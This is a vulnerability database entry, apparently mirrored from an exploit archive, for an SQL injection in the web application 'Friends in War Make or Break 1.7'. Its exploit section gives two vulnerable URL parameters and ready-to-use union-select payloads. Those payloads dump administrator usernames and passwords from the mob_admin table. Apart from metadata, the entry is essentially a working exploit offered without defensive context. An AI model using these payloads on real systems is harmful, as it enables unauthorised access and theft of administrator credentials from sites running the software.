Details of VAR-E-201707-0389

ID

VAR-E-201707-0389

TITLE

Friends in War Make or Break 1.7 - SQL Injection Vulnerability

Trust: 0.6

sources: EDBNET: 93601

AFFECTED PRODUCTS

vendor:

friends

model:

in war make or break

scope:

version:

1.7

Trust: 0.6

sources: EDBNET: 93601

EXPLOIT

# # # # #
# Exploit Title: Friends in War Make or Break 1.7 SQL Injection
# Dork: N/A
# Date: 26.07.2017
# Vendor : http://software.friendsinwar.com/
# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Demo: http://localhost/[PATH]/
# Version: 1.7
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/useruploads.php?username=[SQL]
# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# http://localhost/[PATH]/index.php?catid=SQL]
# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# Etc..
# # # # #

Trust: 0.6

sources: EDBNET: 93601

PRICE

free

Trust: 0.6

sources: EDBNET: 93601

TYPE

SQL Injection Vulnerability

Trust: 0.6

sources: EDBNET: 93601

EXTERNAL IDS

db:	0DAYTODAY	id:	28196	Trust: 0.6
db:	EDBNET	id:	93601	Trust: 0.6

sources: EDBNET: 93601

REFERENCES

url:

https://0day.today/exploits/28196

Trust: 0.6

sources: EDBNET: 93601

SOURCES

db:

EDBNET

id:

93601

LAST UPDATE DATE

2022-07-27T09:37:33.045000+00:00

SOURCES RELEASE DATE

db:

EDBNET

id:

93601

date:

2017-07-27T00:00:00